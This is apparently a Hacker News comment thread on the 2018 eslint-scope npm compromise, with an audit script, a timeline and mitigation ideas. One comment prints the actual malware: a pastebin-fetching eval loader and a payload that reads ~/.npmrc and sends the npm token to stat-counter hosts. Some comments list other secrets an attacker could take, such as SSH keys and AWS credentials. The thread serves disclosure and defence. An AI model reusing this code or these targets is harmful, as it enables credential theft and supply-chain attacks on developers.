I was working on a PR for a Node project when I read about this. My changes added some new dependencies and I wanted to make sure I hadn't pulled in any packages that were updated after this incident began (since the authors of those packages might have had their credentials compromised and used to push malicious updates to their packages).

I wrote a script to extract all of my changed dependencies from package-lock.json and retrieve the publication date of the resolved version from registry.npmjs.org. It's hacky but here's the steps:

First run this pipeline. You can change the first two lines if you're interested in the whole package-lock.json; I was just interested in my changes.

    git diff master -- package-lock.json \
    | grep '+\s*"resolved":' \
    | awk '$2 == "\"resolved\":" {print $3}' \
    | cut -d '"' -f2 \
    | perl -pe "s/\/-\/(?:\\S+-)((?:[0-9]+)(?:\\.[0-9]+)+\\S+)\\.tgz/ \1/" \
    > dep-urls-and-versions.txt
You now have a file which contains on each line a URL, then a space, then a version string. I ran this python script on the file.

    import requests

    with open("dep-urls-and-versions.txt", "r") as f:
        for line in f.readlines():
            url, version = line.strip().split(" ")
            res = requests.get(url)
            body = res.json()
            print(body["time"][version], body["name"])
Run it as `python script.py | sort` and you'll get your changed dependencies sorted by publish date. Just check that the last (bottom-most) timestamp is older than 2018-07-12 10:25 UTC, when the first compromised package was published.

Hope that helps someone.


I am very surprised they stopped at just grabbing your .npmrc. They could have grabbed basically anything they wanted, like ~/.aws/credentials, your whole .bashrc (which often contains a whole slew of API keys and access tokens), and even your whole ~/.ssh.


Clearly more could have been done. It's suspicious that they'd only grab npm tokens. Perhaps the responsible party just wanted to prove a point?


It looks like a virus that may try to replicate later on. If it had passed unnoticed, it could have gathered enough npm tokens to attack a much larger portion of developers. Nonetheless, starting with eslint should already provide quite a lot of credentials.


just get known_hosts and id_rsa rule the ~world~ cloud


Important detail: these packages are dependencies of a lot of things, most notably Webpack, so you can be exposed even if you haven't done anything specific with eslint.


We're lucky this issue was detected because of an error. I would bet this has happened, or is happening now, without anyone knowing. In JavaScript it is particularly difficult to find malicious code, since code can be executed in so many forms. As long as eval exists, npm allows pre/post-install scripts, and require executes code, there's not much we can do except remain ignorant of what's actually running every time we use node.


Moving forward NPM should require 2-factor authentication for popular packages.


This seems like a good idea. If a package has more than x downloads or y dependencies, then require 2fa for publishing it.


Or for publishing all packages


I cannot think of a reasonable argument against this if security is any priority at all at NPM.


Has anyone ever written a static analyzer to audit an npm package? Say I'm looking to add a new npm dependency, and I do my due diligence, poring over the code, scanning the issues log, etc., and everything looks kosher. It would still be nice to run it through some kind of automated analyzer, which also recursively scans dependencies. I ask because even simply grepping each file for the string "eval" would have flagged this.



There is an ‘npm audit’ command, but that checks for known vulnerable versions of packages, so it’s not a static analyzer as far as I know.


Yeah, I am thinking of something more like linting+ for packages, and for the published code, not the code from the git repo.

    % analyze-some-npm-package some-package@2.1.1
    → some-package/foo.js contains a syntax error
    → some-package/bar.js calls eval() on line blah blah
    → sub-dependency@2.3.4 is only 2 hours old
...that sort of thing. I suppose it would be a pretty big undertaking.


I think all of those cases are possible today, you just need the right tools.

For example:

1. contains a syntax error: this is solved with TypeScript or flow which can run against a .js file

2. calls to eval(): this is solved by linting the .js file

3. only 2 hours old: this is solved by looking at npm publish date for the package version...take a look at the "time" key here: https://registry.npmjs.com/eslint-scope
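For point 2, a bare-bones sketch of a config you could point at freshly downloaded package code (the three rules are standard ESLint core rules; the usage line is just an example):

  // .eslintrc.audit.js - minimal config for scanning third-party package code
  module.exports = {
    parserOptions: { ecmaVersion: 2018 },
    env: { node: true },
    rules: {
      'no-eval': 'error',         // direct eval(...) calls
      'no-implied-eval': 'error', // setTimeout("...")-style string evaluation
      'no-new-func': 'error'      // new Function("...")
    }
  };

Run it with something like `eslint --no-eslintrc -c .eslintrc.audit.js node_modules/some-package`, and keep the obfuscation caveats from elsewhere in this thread in mind: an attacker who expects this won't write a literal eval.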


What bothers me a lot is that no one has talked about a possible leak of credentials for private npm registries. Keys (along with registry URLs) are usually stored in .npmrc along with everything else.

The fact that npmjs.com revoked access tokens has no effect on private registry access tokens. I would recommend that everyone who uses a private npm registry investigate the possibility of a credential leak.


# Tech summary:

- Since 2018-07-12 9:49 UTC, eslint-scope has been infected; the script tries to send your ".npmrc" file to two different stat counter websites (sstatic1.histats.com, c.statcounter.com) via the Referer header. Affected packages: eslint-scope@3.7.2 and eslint-config-eslint@5.0.2.

- The ".npmrc" (contains your npm tokens to publish a new npm package under your account) would allow the attacker to publish other npm package under your name (if you are a owner) and make a bigger mess.

- Looks like the attacker wanted to gain control of more npm packages and may already have done so. The infected package was removed at 2018-07-12 12:37 UTC, so the attacker had at least a few hours to gather other npm auth tokens.

- Between 2018-07-12 12:37 UTC and 2018-07-12 17:41 UTC the package eslint-scope@3.7.2 was removed, but some machines could still pull the old version from a cache, widening the attack window. Only at 2018-07-12 17:41 UTC was a new version deployed.

- Be careful if you cache npm packages on your server (nexus or similar).

# All npm packages that directly depend on "eslint-scope"

  - "webpack" (9k dependents)
  - "eslint" (6k dependents)
  - "babel-eslint" (5k dependents)
  - "vue-eslint-parser"
  - "atom-eslint-parser"
  - "eslint-web"
  - "react-input-select"
  - "react-native-handcheque-engine"
  - "react-redux-demo1"
  - "a_react_reflux_demo"
  - "eslint-nullish-coalescing"
  - "@mattduffield/eslint4b"
  - "miguelcostero-ng2-toasty"
  - "@sailshq/eslint"
  - "eslint4b"
  - "@helpscout/zero"
 
Be careful: there are more packages that depend on these as well.

# What to do now?

Assume your ".npmrc" file has been stolen. If you have any packages published they might have been compromised, check them. NPM team revoked all auth tokens at 2018-07-12 12:30 UTC.

# How it happened:

"The maintainer whose account was compromised had reused their npm password on several other sites and did not have two-factor authentication enabled on their npm account."

# How it was discovered

At 12:17 UK time on 12 July 2018, https://github.com/pronebird opened an issue, https://github.com/eslint/eslint-scope/issues/39, with this error log:

  [2/3] ⠠ eslint-scope
  error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
    Exit code: 1
  Command: node ./lib/build.js
  Arguments:
    Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope
  Output:
    undefined:30
  https1.get({hostname:'sstatic1.histats.com',path:'/0.gif?4103075&101',method:'GET',headers:{Referer:'http://1.a/'+conten
      ^^^^^^
  
      SyntaxError: Unexpected end of input
  at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
  at emitOne (events.js:116:13)
  at IncomingMessage.emit (events.js:211:7)
  at IncomingMessage.Readable.read (_stream_readable.js:475:10)
  at flow (_stream_readable.js:846:34)
  at resume_ (_stream_readable.js:828:3)
  at _combinedTickCallback (internal/process/next_tick.js:138:11)

So it looks like if there had been no error, we would not have discovered it so quickly. We were lucky!

# Technical details:

node_module code for eslint-scope-3.7.2 https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.2... (still the original code):

  try {
    var https = require('https');
    https.get({
      'hostname': 'pastebin.com',
      path: '/raw/XLeVP82h',
      headers: {
        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',
        Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
      }
    }, (r) => {
      r.setEncoding('utf8');
      r.on('data', (c) => {
        eval(c);
      });
      r.on('error', () => {
      });
  
    }).on('error', () => {
    });
  } catch (e) {
  }
Pastebin script http://pastebin.com/raw/XLeVP82h (Now removed):

  try {
    var path = require('path');
    var fs = require('fs');
    var npmrc = path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc');
    var content = "nofile";
  
    if (fs.existsSync(npmrc)) {
  
      content = fs.readFileSync(npmrc, {encoding: 'utf8'});
      content = content.replace('//registry.npmjs.org/:_authToken=', '').trim();
  
      var https1 = require('https');
      https1.get({
        hostname: 'sstatic1.histats.com',
        path: '/0.gif?4103075&101',
        method: 'GET',
        headers: {Referer: 'http://1.a/' + content}
      }, () => {
      }).on("error", () => {
      });
      https1.get({
        hostname: 'c.statcounter.com',
        path: '/11760461/0/7b5b9d71/1/',
        method: 'GET',
        headers: {Referer: 'http://2.b/' + content}
      }, () => {
      }).on("error", () => {
      });
  
    }
  } catch (e) {
  }

"As you can tell, the script finds your npmrc file and passes your auth token to two different stat counter websites, via the referrer header."

Source: https://github.com/eslint/eslint-scope/issues/39

# How to mitigate malicious npm/yarn packages in front-end code

I actually discussed this with my colleagues at work. I think from now on I'll assume that all code is compromised.

One big way to reduce this attack vector is a restrictive Content-Security-Policy, e.g. the sandbox directive plus 'self'-only source directives (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP). This stops your page from making requests to other websites, not even via an img tag or window.open. That way, even if the attacker has your password, they can't send it to their server.

Of course the attacker can still mess with your code, but it reduces the attack surface a bit. Example: let's say you are building a trading platform; you want to buy 1 share, but the attacker bumps your order to 10 shares without you even knowing. For this to happen, though, the attacker has to specifically target your website.

Read more about security of node_modules and other packages (this could affect java and other languages, not just javascript and npm/yarn): https://hackernoon.com/im-harvesting-credit-card-numbers-and...

Be careful: if you whitelist Google Analytics, the attacker can send the passwords to their own Google Analytics account as well. You could also check that the analytics URL contains your GA ID, but the attacker could bypass that too.
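For reference, a sketch of setting such a policy from a plain Node server (the directive values are only an illustration; loosen them to whatever your page actually needs):

  const http = require('http');

  http.createServer((req, res) => {
    // 'self'-only sources leave injected front-end code no obvious way to
    // exfiltrate data to a third-party origin (img, fetch/XHR, script, form posts)
    res.setHeader('Content-Security-Policy',
      "default-src 'self'; img-src 'self'; connect-src 'self'; form-action 'self'");
    res.setHeader('Content-Type', 'text/html');
    res.end('<!doctype html><html><body>...</body></html>');
  }).listen(8080);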

# What to do next

Think of more ways to mitigate malicious node_modules and how to handle them.

Even if npm improves its security, we still can't rely on every dev having our best interests in mind or never being hacked. So I think we really need to treat npm modules as compromised by default and work from there.

# More implications I can think of (please add more)

Assume that any server (e.g. Jenkins) that installs your node_modules can also be infected (you could use Docker to mitigate this).

If you run a Node.js app, be careful about open ports and network requests (limit inbound and outbound domains). Even that's not enough: the attacker could add a new route to your website, say "/your-passwords", that returns a JSON dump of your users table. Not easy to do, but possible if your server has a malicious node_module.

Any other important/private files you have on your pc could have been stolen.

Very unlikely: your server side could be infected (maybe some other code was executed there from this package; I'm not sure if the pastebin contents could be updated) and propagate to other servers.

This is just a package we happened to notice, maybe there are more infected packages we don't know about.


I am not familiar with npm package maintenance. Can somebody explain these two recommendations to me?

    Package maintainers should be careful with using
    any services that auto-merge dependency upgrades.
What is an example of such a service? What is an 'auto-merge' of 'dependency upgrades'?

    Application developers should use a lockfile
    (package-lock.json or yarn.lock) to prevent the
    auto-install of new packages.
What is an auto-install of a new package? What triggers it?


I guess there are CI services that pull the latest versions of dependencies (within the accepted version range), build, run the tests, and submit a pull request if everything seems OK.

Edit: actually no I don't know, there would be nothing to submit if no lockfile is used.
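To the second question: without a lockfile, a dependency range like "eslint-scope": "^3.7.1" resolves to the newest matching version at the next install, which is how the bad 3.7.2 got picked up by builds here. A lockfile pins the exact resolved version plus an integrity hash, roughly like this package-lock.json excerpt (the hash value is shortened/illustrative):

  "eslint-scope": {
    "version": "3.7.1",
    "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-3.7.1.tgz",
    "integrity": "sha512-..."
  }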


One thing that is unclear to me is how sending the credentials to StatCounter works for the attacker. How would they recover the credentials afterwards? Assuming the StatCounter website itself has not turned bad, of course.

I can think of two potential ways, but I have no idea if it's either of those:

- A very detailed analytics filter, to the point of seeing individual requests and therefore the token in the referrer URL.

- The referrer URL is the one actually receiving the info, so when StatCounter tries to crawl it, it sends the credentials there.


Does anyone know if this would also affect desktop/Electron apps that use those packages?


So what are you (the ESLint team) going to do to ensure this is not going to happen again in the future?

At the very least you should require that all ESLint members with rights to publish ESLint packages have 2FA enabled on their npm account.


Can't nodejs run by default as user "node-<project-name>-<username>"? i.e. run the process as "node-react-whatcanthisbee"?

(or provide option to do so using "isolated-node" versions/flags/etc)

that way, a lot of malicious stuff can be blocked with unix/linux basic permissions

(though spectre/etc stuff will be much harder to catch...)


It appears all publishing keys have been revoked? We don't use eslint at work, yet all our publishing keys were revoked.


npm shrinkwrap could have helped here (at least with the spreading).


Npm uses a lockfile by default now.


So now merely typing `npm update` will get your data stolen. How innovative.


It kinda sucks that NPM auth tokens never expire


Who was this attacker? I don't believe he is impossible to track down. Has the eslint team called law enforcement?


The attacker used generic sites (pastebin, stat counter sites), and there is no reason to think they did not access them through Tor. Why would it be possible to track them down?


Ah, a stat counter - I'd read it as "he sent it to himself" and thought it was somehow direct.

Yes, not so easy.


"Security by punishment" is a terrible paradigm that's not Web Scale. The internet is not the physical world — the attackers are probably accessing your stuff via Tor from a public wifi in a country far away.

If someone couldn't do basic things to secure their account, they should take the blame.


We don't need to victim-blame here. We can both practice good security and try to find and prosecute those responsible.


The only recommendation for users is "you should avoid reusing the same password across multiple different sites. A password manager like 1Password or LastPass can help with this."

Seriously? No help to tell me if I have been affected?

If someone here knows a JS linter that does not require npm/yarn, even ten times less powerful than eslint, please share. It's astonishing that linting C++ requires one file, https://github.com/google/styleguide/blob/gh-pages/cpplint/c..., but linting JS requires MBs of dependencies.


Google's Closure compiler [1] has been around forever (the Java version, anyway). There used to be a separate linter, but now it's wrapped into the compiler using the flag `--jscomp_warnings=lintChecks`

Given the number of other tools in my workflow that are all JS based (webpack, etc.) I don't use it, but I've heard good things from people who have.

[1] https://developers.google.com/closure/compiler/



